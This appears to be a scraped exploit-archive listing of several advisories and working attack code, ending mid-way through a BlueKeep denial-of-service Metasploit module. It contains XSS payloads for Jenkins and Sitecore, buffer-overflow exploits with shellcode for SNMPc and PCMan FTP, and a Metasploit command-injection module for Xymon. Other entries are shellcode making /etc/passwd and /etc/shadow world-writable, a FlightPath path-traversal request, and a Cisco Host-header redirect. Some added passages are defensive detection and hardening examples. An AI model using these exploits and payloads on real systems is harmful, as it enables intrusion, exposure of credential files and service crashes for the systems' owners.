Microsoft Font Subsetting DLL ComputeFormat4CmapData Heap Corruption
Jenkins Dependency Graph View 0.13 Cross Site Scripting
Jenkins Dependency Graph View plugin version 0.13 suffers from a persistent cross site scripting vulnerability.
c1ce6b865eb9188b93661b01f4e2d546
# Exploit Title: Persistent XSS - Dependency Graph View Plugin(v0.13)
# Vendor Homepage: https://wiki.jenkins.io/display/JENKINS/Dependency+Graph+View+Plugin
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# Platform: Java
# CVE: CVE-2019-10349
# Jenkins issue: #SECURITY-1177
1. Description:
The "Display Name" field in General Options of the Configure module in
Jenkins was found to accept arbitrary values which, when loaded in the
Dependency Graph View module, get executed, which makes it vulnerable to a
Stored/Persistent XSS.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10349
2. Proof of Concept:
Vulnerable Source
http://{jenkins-hostname:port}/jobs/{projectname}/configure
Steps to Reproduce:
Login to Jenkins Server with valid credentials and ensure that the
dependency graph plugin is installed.
1. Click on configure the Jenkins plugin.
2. Select advanced options
3. Enter the XSS payload in the "Display Name" field
4. Navigate to Dependency Graph module
5. Observe the Executed Payload
6. Payload used for the demo:
<img src="a" onerror="alert('jenkinsxss')">
3. Solution:
As of publication of this advisory, there is no fix.
The plugin has been abandoned by the maintainer.
Reference
https://jenkins.io/security/advisory/2019-07-11/#SECURITY-1177
--
Best Regards,
Ishaq Mohammed
https://about.me/security-prince
SNMPc Enterprise Edition 9 / 10 Mapping Filename Buffer Overflow
SNMPc Enterprise Edition versions 9 and 10 suffer from a mapping filename buffer overflow vulnerability.
109af1e27d2b7507c41e3905ac72c086
#!/usr/bin/python
# -*- coding: utf-8 -*-
#--------------------------------------------------------------------#
# Exploit: SNMPc Enterprise Edition (9 & 10) (Mapping File Name BOF) #
# Date: 11 July 2019 #
# Exploit Author: @xerubus | mogozobo.com #
# Vendor Homepage: https://www.castlerock.com/ #
# Software Link: https://www.castlerock.com/products/snmpc/ #
# Version: Enterprise Edition 9 & 10 #
# Tested on: Windows 7 #
# CVE-ID: CVE-2019-13494 #
# Full write-up: https://www.mogozobo.com/?p=3534 #
#--------------------------------------------------------------------#
import sys, os
os.system('clear')
print("""\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= SNMPc_Mapping_BOF by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
(_ )( _)
@Xerubus
""")
filename="evilmap.csv"
junk = "A" * 2064
nseh = "\xeb\x07\x90\x90" # short jmp to 0018f58d \xeb\x07\x90\x90
seh = "\x05\x3c\x0e\x10" # 0x100e3c05 ; pop esi # pop edi # ret (C:\program files (x86)\snmpc network manager\CRDBAPI.dll)
# Pre-padding of mapping file. Note mandatory trailing character return.
pre_padding = (
"Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password"
"\"Root Subnet\",\"Subnet\",\"\",\"\",\"\",\"2\",\"000=Unknown\",\"\",\"auto.ico\",\"\",\"2\",\"Square\",\"(NULL)\",\"(0,0)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"127.0.0.1\",\"30\",\"2\",\"2\",\"\",\"0\",\"0\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n"
"\"")
# Post-padding of mapping file. Note mandatory trailing character return.
post_padding = (
"\",\"Device\",\"127.0.0.1\",\"1.3.6.1.4.1.29671.2.107\",\"\",\"3\",\"000=Unknown\",\"000=Unknown\",\"auto.ico\",\"\",\"2\",\"Square\",\"Root Subnet(2)\",\"(-16,-64)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"127.0.0.1\",\"30\",\"2\",\"2\",\"\",\"0\",\"=\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n")
# msfvenom --platform windows -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f c
shellcode = (
"\xda\xcc\xd9\x74\x24\xf4\xba\xd9\xa1\x94\x48\x5f\x2b\xc9\xb1"
"\x31\x31\x57\x18\x83\xc7\x04\x03\x57\xcd\x43\x61\xb4\x05\x01"
"\x8a\x45\xd5\x66\x02\xa0\xe4\xa6\x70\xa0\x56\x17\xf2\xe4\x5a"
"\xdc\x56\x1d\xe9\x90\x7e\x12\x5a\x1e\x59\x1d\x5b\x33\x99\x3c"
"\xdf\x4e\xce\x9e\xde\x80\x03\xde\x27\xfc\xee\xb2\xf0\x8a\x5d"
"\x23\x75\xc6\x5d\xc8\xc5\xc6\xe5\x2d\x9d\xe9\xc4\xe3\x96\xb3"
"\xc6\x02\x7b\xc8\x4e\x1d\x98\xf5\x19\x96\x6a\x81\x9b\x7e\xa3"
"\x6a\x37\xbf\x0c\x99\x49\x87\xaa\x42\x3c\xf1\xc9\xff\x47\xc6"
"\xb0\xdb\xc2\xdd\x12\xaf\x75\x3a\xa3\x7c\xe3\xc9\xaf\xc9\x67"
"\x95\xb3\xcc\xa4\xad\xcf\x45\x4b\x62\x46\x1d\x68\xa6\x03\xc5"
"\x11\xff\xe9\xa8\x2e\x1f\x52\x14\x8b\x6b\x7e\x41\xa6\x31\x14"
"\x94\x34\x4c\x5a\x96\x46\x4f\xca\xff\x77\xc4\x85\x78\x88\x0f"
"\xe2\x77\xc2\x12\x42\x10\x8b\xc6\xd7\x7d\x2c\x3d\x1b\x78\xaf"
"\xb4\xe3\x7f\xaf\xbc\xe6\xc4\x77\x2c\x9a\x55\x12\x52\x09\x55"
"\x37\x31\xcc\xc5\xdb\x98\x6b\x6e\x79\xe5")
print "[+] Building payload.."
payload = "\x90" * 10 + shellcode
print "[+] Creating buffer.."
buffer = pre_padding + junk + nseh + seh + payload + "\x90" * 10 + post_padding
print "[+] Writing evil mapping file.."
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
print "[+] Done. Import evilmap.csv into SNMPc and A Wild Calc Appears!\n\n"
Sitecore 9.0 Rev 171002 Cross Site Scripting
Sitecore version 9.0 rev 171002 suffers from a persistent cross site scripting vulnerability.
39d6c982acaa37a46cb0a8d2e1d7da4c
# Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore 9.0 rev 171002
# Date: July 11, 2019
# Exploit Author: Owais Mehtab
# Vendor Homepage: http://www.sitecore.net/en
# Version: 9.0 rev. 171002
# Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
# CVE : CVE-2019-13493
Vendor Description
------------------
Sitecore CMS makes it effortless to create content and experience rich websites that help you achieve your business goals such as increasing sales and search engine visibility, while being straight-forward to integrate and administer. Sitecore lets you deliver sites that are highly scalable, robust and secure. Whether you're focused on marketing, development and design, or providing site content, Sitecore delivers for you.
Description
------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Vulnerability Class
--------------------
Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Proof of Concept
----------------
The File Extension parameter is not properly escaped. This could lead to an XSS attack that could possibly affect administrators, users and editors.
1. Login to application and navigate to "https://example.com/sitecore/shell/Applications/Content Editor.aspx?sw_bw=1"
2. Go to media library and click on any image and edit it
3. Now in Extension input parameter inject any XSS vector like '"><svg=onload=prompt(2)>
Xymon useradm Command Execution
This Metasploit module exploits a command injection vulnerability in Xymon versions before 4.3.25 which allows authenticated users to execute arbitrary operating system commands as the web server user. When adding a new user to the system via the web interface with useradm.sh, the user's username and password are passed to htpasswd in a call to system() without validation. This module has been tested successfully on Xymon version 4.3.10 on Debian 6.
5d1fdb4c7a1abc1fbc3c13a84a4a2eef
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Xymon useradm Command Execution',
'Description' => %q{
This module exploits a command injection vulnerability in Xymon
versions before 4.3.25 which allows authenticated users
to execute arbitrary operating system commands as the web
server user.
When adding a new user to the system via the web interface with
`useradm.sh`, the user's username and password are passed to
`htpasswd` in a call to `system()` without validation.
This module has been tested successfully on Xymon version 4.3.10
on Debian 6.
},
'License' => MSF_LICENSE,
'Author' => [
'Markus Krell', # Discovery
'bcoles' # Metasploit
],
'References' =>
[
['CVE', '2016-2056'],
['PACKETSTORM', '135758'],
['URL', 'https://lists.xymon.com/pipermail/xymon/2016-February/042986.html'],
['URL', 'https://www.securityfocus.com/archive/1/537522/100/0/threaded'],
['URL', 'https://sourceforge.net/p/xymon/code/7892/'],
['URL', 'https://www.debian.org/security/2016/dsa-3495']
],
'DisclosureDate' => '2016-02-14',
'Platform' => %w(unix linux solaris bsd),
'Targets' =>
[
[
'Unix CMD',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' => {
'Space' => 2048,
'BadChars' => "\x00\x0A\x0D",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python netcat php'
}
}
}
],
[
'Linux',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86,ARCH_X64],
}
],
[
'Solaris',
{
'Platform' => 'solaris',
'Arch' => [ARCH_X86]
}
],
[
'BSD',
{
'Platform' => 'bsd',
'Arch' => [ARCH_X86, ARCH_X64]
}
]
],
'Privileged' => false,
'DefaultTarget' => 0))
register_options([
OptString.new('TARGETURI', [
true, 'The base path to Xymon secure CGI directory', '/xymon-seccgi/'
]),
OptString.new('USERNAME', [true, 'The username for Xymon']),
OptString.new('PASSWORD', [true, 'The password for Xymon'])
])
end
def user
datastore['USERNAME']
end
def pass
datastore['PASSWORD']
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'useradm.sh'),
'authorization' => basic_auth(user, pass)
})
unless res
vprint_status "#{peer} - Connection failed"
return CheckCode::Unknown
end
if res.code == 401
vprint_status "#{peer} - Authentication failed"
return CheckCode::Unknown
end
if res.code == 404
vprint_status "#{peer} - useradm.sh not found"
return CheckCode::Safe
end
unless res.body.include?('Xymon')
vprint_status "#{peer} - Target is not a Xymon server."
return CheckCode::Safe
end
version = res.body.scan(/>Xymon ([\d\.]+)</).flatten.first
unless version
vprint_status "#{peer} - Could not determine Xymon version"
return CheckCode::Detected
end
vprint_status "#{peer} - Xymon version #{version}"
if Gem::Version.new(version) >= Gem::Version.new('4.3.25')
return CheckCode::Safe
end
CheckCode::Appears
end
def execute_command(cmd, opts = {})
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'useradm.sh'),
'method' => 'POST',
'authorization' => basic_auth(user, pass),
'vars_post' => Hash[{
'USERNAME' => "';#{cmd} & echo '",
'PASSWORD' => '',
'SendCreate' => 'Create'
}.to_a.shuffle]
}, 5)
return if session_created?
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code == 401
fail_with(Failure::NoAccess, 'Authentication failed')
end
unless res.code == 500
fail_with(Failure::Unknown, 'Unexpected reply')
end
print_good "#{peer} - Payload sent successfully"
res
end
def exploit
unless [Exploit::CheckCode::Detected, Exploit::CheckCode::Appears].include?(check)
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if payload.arch.first == 'cmd'
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 1_500)
end
end
end
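The flaw described above is form values pasted into a shell command line for htpasswd. The following is an added example, not code from Xymon or from the Metasploit module: it shows that pattern beside a form that validates the username and passes an argv list with no shell. The function names, the allowlist pattern, the `-b` call shape and the password-file path are assumptions for illustration; `CMD` stands in for any injected command.

```python
import re
import shlex
import subprocess

# Assumptions for illustration: the allowlist pattern and the file path are
# placeholders, not values taken from Xymon.
USERNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,31}")
PASSWD_FILE = "/path/to/xymonpasswd"
SHELL_OPERATORS = {";", "&", "&&", "|", "||"}


def flawed_command(username, password):
    """Shape of the flawed call: form values pasted into one shell string."""
    return "htpasswd -b '%s' '%s' '%s'" % (PASSWD_FILE, username, password)


def commands_seen_by_shell(command):
    """Approximate how a POSIX shell splits `command` into separate commands.

    shlex is not a full shell parser (a quoted lone ';' is counted as an
    operator), but it is enough to show where the quoting breaks.
    """
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    lexer.commenters = ""
    commands, current = [], []
    for token in lexer:
        if token in SHELL_OPERATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def hardened_invocation(username, password):
    """Return (argv, stdin_bytes) for htpasswd with no shell involved."""
    # The allowlist also blocks a leading '-' (option injection) and ':'.
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username rejected by allowlist")
    if not password or any(c in password for c in "\r\n\x00"):
        raise ValueError("password is empty or contains control characters")
    # htpasswd -i reads the password from stdin, so it never appears in the
    # process list.
    argv = ["htpasswd", "-i", PASSWD_FILE, username]
    return argv, (password + "\n").encode()


def add_user(username, password):
    """Run htpasswd with the validated arguments."""
    argv, stdin_bytes = hardened_invocation(username, password)
    # A list argv with shell=False (the default) reaches exec unchanged.
    subprocess.run(argv, input=stdin_bytes, check=True)


if __name__ == "__main__":
    injected = "';CMD & echo '"  # constructed, same shape as the module's value
    for name in ("alice", injected):
        print(repr(name), "->", commands_seen_by_shell(flawed_command(name, "pw")))
```

With a benign name the shell sees one command; with the quote-breaking value it sees three, and the same value is rejected by `hardened_invocation` before any process is started.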
Linux/x86 chmod 666 /etc/passwd / /etc/shadow Shellcode
61 bytes small Linux/x86 chmod 666 /etc/passwd and chmod 666 /etc/shadow shellcode.
1d275af34ac3eb4e6782353a61ffbebe
# Exploit Title: Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow (61 bytes)
# Date: 10/07/2019
# Exploit Author: Xavier Invers Fornells
# Contact: x4v1s3c@gmail.com
# Tested on: Debian 4.19.28
# Architecture: x86
# Size: 61 bytes
#################################### chmod.nasm ####################################
global _start
section .text
_start:
push byte 15
pop eax
push byte 0x64
push word 0x7773
push 0x7361702f
push 0x6374652f
mov ebx, esp
push word 0x1b6
pop ecx
int 0x80
push byte 15
pop eax
push byte 0x77
push word 0x6f64
push 0x6168732f
push 0x6374652f
mov ebx, esp
push word 0x1b6
pop ecx
int 0x80
push byte 1
pop eax
int 0x80
#################################### shellcode.c ####################################
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x6a\x0f\x58\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x0f\x58\x6a\x77\x66\x68\x64\x6f\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Cisco Small Business Switch Information Leakage / Open Redirect
Cisco Small Business switches versions 200, 300, and 500 suffer from information leakage and open redirection vulnerabilities.
eb2b5e1203a3fa2ae1b9100c12d53de7
# Exploit Title: CISCO Small Business 200, 300, 500 Switches Multiple Vulnerabilities.
# Shodan query: /config/log_off_page.html
# Discovered Date: 07/03/2014
# Reported Date: 08/04/2019
# Exploit Author: Ramikan
# Website: http://fact-in-hack.blogspot.com
# Vendor Homepage: https://www.cisco.com/c/en/us/products/switches/small-business-300-series-managed-switches/index.html
# Affected Devices: The affected products are all Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled.
# Tested On: Cisco C300 Switch
# Version: 1.3.7.18
# CVE : CVE-2019-1943
# CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)
# Category: Hardware, Web Apps
# Reference : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
*************************************************************************************************************************************
Vulnerability 1: Information Gathering
*************************************************************************************************************************************
Unauthenticated user can find the version number and device type by visiting this link directly.
Affected URL:
/cs703dae2c/device/English/dictionaryLogin.xml
*************************************************************************************************************************************
Vulnerability 2: Open Redirect due to host header.
*************************************************************************************************************************************
The domain under the Host header can be changed to a different one, which redirects the request to a fake website. This can be used for phishing attacks and also for domain fronting.
Normal Request
GET / HTTP/1.1
Host: 10.1.1.120
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Normal Response
HTTP/1.1 302 Redirect
Server: GoAhead-Webs
Date: Fri Mar 07 09:40:22 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: https://10.21.151.120/cs703dae2c/
<html><head></head><body>
This document has moved to a new <a href="https://10.1.1.120/cs703dae2c/">location</a>.
Please update your documents to reflect the new location.
</body></html>
*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Host Header changed to different domain (example google.com).
Request:
GET /cs703dae2c HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: activeLangId=English; isStackableDevice=false
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 302 Redirect
activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs
Date: Fri Mar 07 09:45:26 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://google.com/cs703dae2c/config/log_off_page.htm
<html><head></head><body>
This document has moved to a new <a href="http://google.com/cs703dae2c/config/log_off_page.htm">location</a>.
Please update your documents to reflect the new location.
</body></html>
The redirection is happening to http://google.com/cs703dae2c/config/log_off_page.htm. The attacker needs to be in the same network and should be able to modify the victim's request on the wire in order to trigger this vulnerability.
*************************************************************************************************************************************
Attack Vector:
*************************************************************************************************************************************
Can be used for domain fronting.
curl -k --header "Host: attack.host.net" "domainname of the cisco device"
*************************************************************************************************************************************
Vendor Response:
*************************************************************************************************************************************
Issue 1:
Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so, we will treat it as a hardening enhancement.
Issue 2:
The developers won't be able to provide a fix for this in the short term (90 days), so, we are planning to disclose this issue through an advisory on July 17th 2019.
We have assigned CVE CVE-2019-1943 for this issue.
Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
*************************************************************************************************************************************
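The Host-header redirect shown in the captures above can be checked for and avoided as follows. This is an added example, not Cisco's code or the advisory author's: one function flags a captured 302 whose Location follows an untrusted Host header, and one builds the redirect from a configured address instead. The function names and the trusted-host set are assumptions, and the captures are trimmed from the ones quoted in the advisory.

```python
from urllib.parse import urlsplit

# Constructed captures, trimmed from the request/response pairs quoted above.
NORMAL_REQUEST = "GET / HTTP/1.1\r\nHost: 10.1.1.120\r\nConnection: close\r\n\r\n"
NORMAL_RESPONSE = ("HTTP/1.1 302 Redirect\r\nServer: GoAhead-Webs\r\n"
                   "Location: https://10.1.1.120/cs703dae2c/\r\n\r\n")
POC_REQUEST = ("GET /cs703dae2c HTTP/1.1\r\nHost: google.com\r\n"
               "Connection: close\r\n\r\n")
POC_RESPONSE = ("HTTP/1.1 302 Redirect\r\nServer: GoAhead-Webs\r\n"
                "Location: http://google.com/cs703dae2c/config/log_off_page.htm"
                "\r\n\r\n")


def parse_headers(raw):
    """Return (start_line, {lower-cased header name: value}) for a raw message."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def hostname_of(authority):
    """Host part of a Host header value, without the port, lower-cased."""
    return (urlsplit("//" + authority).hostname or "").lower()


def redirect_reflects_host(request_raw, response_raw, trusted_hosts):
    """True when a 3xx Location points at the request's Host header and that
    host is not one of the names the device is configured to answer for."""
    _, req = parse_headers(request_raw)
    status_line, resp = parse_headers(response_raw)
    parts = status_line.split()
    if len(parts) < 2 or not parts[1].startswith("3"):
        return False
    requested = hostname_of(req.get("host", ""))
    target = (urlsplit(resp.get("location", "")).hostname or "").lower()
    return bool(target) and target == requested and target not in trusted_hosts


def redirect_location(request_host, path, canonical_host, trusted_hosts):
    """Build Location from the Host header only if it is trusted; otherwise
    fall back to the configured management address."""
    host = hostname_of(request_host)
    if host not in trusted_hosts:
        host = canonical_host
    return "https://%s%s" % (host, path)


if __name__ == "__main__":
    trusted = {"10.1.1.120"}  # assumption: the switch's own management address
    print(redirect_reflects_host(NORMAL_REQUEST, NORMAL_RESPONSE, trusted))
    print(redirect_reflects_host(POC_REQUEST, POC_RESPONSE, trusted))
    print(redirect_location("google.com", "/cs703dae2c/", "10.1.1.120", trusted))
```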
PCMan FTP Server 2 ALLO Buffer Overflow
PCMan FTP Server 2 ALLO remote buffer overflow exploit.
01605b000736cd3698aa2c0a77b919b8
# Vulnerability Title: PCMan FTP Server 2 - 'ALLO' Remote Buffer Overflow
# Discovered by: Nassim Asrir
# Tested on: win7 x32
# Thanks To : Chagi-Lagi - MY.Neggaoui
#!/usr/bin/python2.7
# -*- coding: utf-8 -*
import socket
ret = "\xf7\xf8\xc5\x75" #@ JMP ESP Kernel32.dll
calc =("\xdd\xc5\xd9\x74\x24\xf4\x5a\x31\xc9\xb8\xd1\x96\xc1\xcb\xb1"
"\x33\x31\x42\x17\x83\xc2\x04\x03\x93\x85\x23\x3e\xef\x42\x2a"
"\xc1\x0f\x93\x4d\x4b\xea\xa2\x5f\x2f\x7f\x96\x6f\x3b\x2d\x1b"
"\x1b\x69\xc5\xa8\x69\xa6\xea\x19\xc7\x90\xc5\x9a\xe9\x1c\x89"
"\x59\x6b\xe1\xd3\x8d\x4b\xd8\x1c\xc0\x8a\x1d\x40\x2b\xde\xf6"
"\x0f\x9e\xcf\x73\x4d\x23\xf1\x53\xda\x1b\x89\xd6\x1c\xef\x23"
"\xd8\x4c\x40\x3f\x92\x74\xea\x67\x03\x85\x3f\x74\x7f\xcc\x34"
"\x4f\x0b\xcf\x9c\x81\xf4\xfe\xe0\x4e\xcb\xcf\xec\x8f\x0b\xf7"
"\x0e\xfa\x67\x04\xb2\xfd\xb3\x77\x68\x8b\x21\xdf\xfb\x2b\x82"
"\xde\x28\xad\x41\xec\x85\xb9\x0e\xf0\x18\x6d\x25\x0c\x90\x90"
"\xea\x85\xe2\xb6\x2e\xce\xb1\xd7\x77\xaa\x14\xe7\x68\x12\xc8"
"\x4d\xe2\xb0\x1d\xf7\xa9\xde\xe0\x75\xd4\xa7\xe3\x85\xd7\x87"
"\x8b\xb4\x5c\x48\xcb\x48\xb7\x2d\x23\x03\x9a\x07\xac\xca\x4e"
"\x1a\xb1\xec\xa4\x58\xcc\x6e\x4d\x20\x2b\x6e\x24\x25\x77\x28"
"\xd4\x57\xe8\xdd\xda\xc4\x09\xf4\xb8\x8b\x99\x94\x10\x2e\x1a"
"\x3e\x6d")
buffer1= '\x41' * 2007 + ret + "\x90" * 40 + calc
print "Sending..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.108.129',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS \r\n')
s.recv(1024)
s.send('ALLO' + buffer1 + '\r\n')
s.close()
FlightPath Local File Inclusion
FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
81a5a17dad2e62aa8208195f197d9a8c
# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
# Date: 07-07-2019
# Exploit Author: Mohammed Althibyani
# Vendor Homepage: http://getflightpath.com
# Software Link: http://getflightpath.com/project/9/releases
# Version: < 4.8.2 & < 5.0-rc2
# Tested on: Kali Linux
# CVE : CVE-2019-13396
# Parameters : include_form
# POST Method:
Use the login form to get the right form_token [ you can use a wrong user/pass ]
This is what the POST looks like:
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D&current_student_id=&user=test&password=test&btn_submit=Login
# Modify the POST request to be:
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
# Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.
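A detection check for the request shown above, as an added example that is not part of the advisory or of FlightPath: it parses a form-encoded POST body and reports `form_include` values that are absolute or contain parent-directory segments. The function names are assumptions, the sample bodies are constructed from the two requests in the advisory, and `TOKEN` is a placeholder.

```python
from urllib.parse import parse_qsl, unquote

# Constructed bodies, shortened from the two POSTs in the advisory.
LOGIN_BODY = ("callback=system_login_form&form_token=TOKEN&form_path=login"
              "&form_include=&user=test&password=test&btn_submit=Login")
MODIFIED_BODY = ("callback=system_login_form&form_token=TOKEN"
                 "&form_include=../../../../../../../../../etc/passwd")


def fully_decoded(value, rounds=3):
    """Undo nested percent-encoding so the check sees the final path."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_form_include(body):
    """Return decoded form_include values that leave the include directory."""
    hits = []
    # parse_qsl performs the first round of percent-decoding itself.
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key != "form_include":
            continue
        path = fully_decoded(value).replace("\\", "/")
        if not path:
            continue  # empty in the unmodified login POST
        segments = path.split("/")
        if path.startswith("/") or "\x00" in path or ".." in segments:
            hits.append(path)
    return hits


if __name__ == "__main__":
    for body in (LOGIN_BODY, MODIFIED_BODY):
        print(suspicious_form_include(body))
```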
Microsoft Windows RDP BlueKeep Denial Of Service
Microsoft Windows Remote Desktop BlueKeep denial of service exploit.
03ea74e7a141e90ebbfc356da5c86bfd
# Exploit Title: Bluekeep Denial of Service (metasploit module)
# Shodan Dork: port:3389
# Date: 07/14/2019
# Exploit Author: RAMELLA Sebastien (https://github.com/mekhalleh/)
# Vendor Homepage: https://microsoft.com
# Version: all affected RDP services by cve-2019-0708
# Tested on: Windows XP (32-bits) / Windows 7 (64-bits)
# CVE : 2019-0708
# I just modified the initial metasploit module for this vuln to produce a denial of service attack.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
Rank = NormalRanking
include Msf::Auxiliary::Dos
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE',
'Description' => %q{
This module checks a range of hosts for the CVE-2019-0708 vulnerability
by binding the MS_T120 channel outside of its normal slot and sending
DoS packets.
},
'Author' =>
[
'National Cyber Security Centre', # Discovery
'JaGoTu', # Module
'zerosum0x0', # Module
'Tom Sellers', # TLS support and documented packets
'RAMELLA Sebastien' # Denial of service module
],
'References' =>
[
[ 'CVE', '2019-0708' ],
[ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ]
],
'DisclosureDate' => '2019-05-14',
'License' => MSF_LICENSE,
'Notes' =>
{
'Stability' => [ CRASH_OS_DOWN ],
'AKA' => ['BlueKeep']
}
))
register_options(
[
OptAddress.new('RDP_CLIENT_IP', [ true, 'The client IPv4 address to report during connection', '192.168.0.100']),
OptString.new('RDP_CLIENT_NAME', [ false, 'The client computer name to report during connection', 'rdesktop']),
OptString.new('RDP_DOMAIN', [ false, 'The client domain name to report during connection', '']),
OptString.new('RDP_USER', [ false, 'The username to report during connection.']),
OptAddressRange.new("RHOSTS", [ true, 'Target address, address range or CIDR identifier']),
OptInt.new('RPORT', [true, 'The target TCP port on which the RDP protocol response', 3389])
]
)
end
# ------------------------------------------------------------------------- #
def bin_to_hex(s)
return(s.each_byte.map { | b | b.to_s(16).rjust(2, '0') }.join)
end
def bytes_to_bignum(bytesIn, order = "little")
bytes = bin_to_hex(bytesIn)
if(order == "little")
bytes = bytes.scan(/../).reverse.join('')
end
s = "0x" + bytes
return(s.to_i(16))
end
## https://www.ruby-forum.com/t/integer-to-byte-string-speed-improvements/67110
def int_to_bytestring(daInt, num_chars = nil)
unless(num_chars)
bits_needed = Math.log(daInt) / Math.log(2)
num_chars = (bits_needed / 8.0).ceil
end
if(pack_code = { 1 => 'C', 2 => 'S', 4 => 'L' }[ num_chars ])
[daInt].pack(pack_code)
else
a = (0..(num_chars)).map{ | i |
(( daInt >> i*8 ) & 0xFF ).chr
}.join
a[0..-2] # Seems legit lol!
end
end
def open_connection()
begin
connect()
sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1)
